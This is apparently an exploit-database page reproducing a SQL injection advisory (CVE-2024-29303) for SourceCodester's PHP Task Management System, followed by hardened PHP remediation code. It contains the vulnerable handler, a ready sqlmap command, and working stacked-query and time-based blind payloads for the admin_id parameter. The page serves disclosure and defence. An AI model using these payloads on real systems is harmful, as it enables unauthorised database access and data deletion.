SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection

CVE: CVE-2024-29303
Category: CWE-89
Price: $500
Severity: High
Author: Exploit Alert Team
Risk: High
Exploitation Type: Remote
Date: 2024-03-26
CPE: cpe:/a:sourcecodester:task_management_system:1.0
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS: 0.7721
EPSSP: 0.88962


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030063

Below is a copy:

```text
# Exploit Title: SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection
# Date: 22 March 2024
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip
# Version: v1.0
# CVE: CVE-2024-29303
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(taskmatic/admin-manage-user.php):

if(isset($_GET['delete_user'])){
  $action_id = $_GET['admin_id'];

  $task_sql = "DELETE FROM task_info WHERE t_user_id = $action_id";
  $delete_task = $obj_admin->db->prepare($task_sql);
  $delete_task->execute();

  $attendance_sql = "DELETE FROM attendance_info WHERE atn_user_id = $action_id";
  $delete_attendance = $obj_admin->db->prepare($attendance_sql);
  $delete_attendance->execute();
  
  $sql = "DELETE FROM tbl_admin WHERE user_id = :id";
  $sent_po = "admin-manage-user.php";
  $obj_admin->delete_data_by_this_method($sql,$action_id,$sent_po);
}

-> sqlmap -u "http://localhost/taskmatic/taskmatic/admin-manage-user.php?delete_user=delete_user&admin_id=28" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs
---
Parameter: admin_id (GET)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: delete_user=delete_user&admin_id=28;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: delete_user=delete_user&admin_id=28 AND (SELECT 9863 FROM (SELECT(SLEEP(5)))wYJM)
---
```
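In the handler quoted above, the first two `DELETE` statements concatenate `$action_id` into the SQL text before `prepare()` is called, so preparing them gives no protection; only the third uses the `:id` placeholder. The following is an added example of a hardened form, not code from the advisory or from the project: the table and column names come from the advisory, while the function name `delete_user_hardened` and the in-memory SQLite database are assumptions made so the script runs offline (the real application uses MySQL).

```php
<?php
// Added example: hardened delete handler. Table and column names are taken
// from the advisory; the function name and the SQLite demo database are
// constructed for illustration (the application itself runs on MySQL).
declare(strict_types=1);

function delete_user_hardened(PDO $db, $rawId): bool
{
    // Accept only a positive decimal integer; anything with trailing SQL fails.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false;
    }
    $statements = [
        'DELETE FROM task_info WHERE t_user_id = :id',
        'DELETE FROM attendance_info WHERE atn_user_id = :id',
        'DELETE FROM tbl_admin WHERE user_id = :id',
    ];
    // One transaction, so a failure cannot leave the user half-deleted.
    $db->beginTransaction();
    try {
        foreach ($statements as $sql) {
            $stmt = $db->prepare($sql);
            // The value travels as a bound integer, never as SQL text.
            $stmt->bindValue(':id', $id, PDO::PARAM_INT);
            $stmt->execute();
        }
        $db->commit();
    } catch (PDOException $e) {
        $db->rollBack();
        throw $e;
    }
    return true;
}

// Constructed sample data.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE task_info (t_user_id INTEGER)');
$db->exec('CREATE TABLE attendance_info (atn_user_id INTEGER)');
$db->exec('CREATE TABLE tbl_admin (user_id INTEGER)');
$db->exec('INSERT INTO tbl_admin VALUES (27), (28)');
$db->exec('INSERT INTO task_info VALUES (27), (28)');

// A non-integer value shaped like the reported payloads, then a valid id.
var_dump(delete_user_hardened($db, '28 AND (SELECT 1)'));
var_dump(delete_user_hardened($db, '28'));
var_dump((int) $db->query('SELECT COUNT(*) FROM tbl_admin')->fetchColumn());
```

On the MySQL connection itself, passing `PDO::ATTR_EMULATE_PREPARES => false` and `PDO::MYSQL_ATTR_MULTI_STATEMENTS => false` in the PDO constructor options adds defense in depth against the stacked-query case sqlmap reported.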
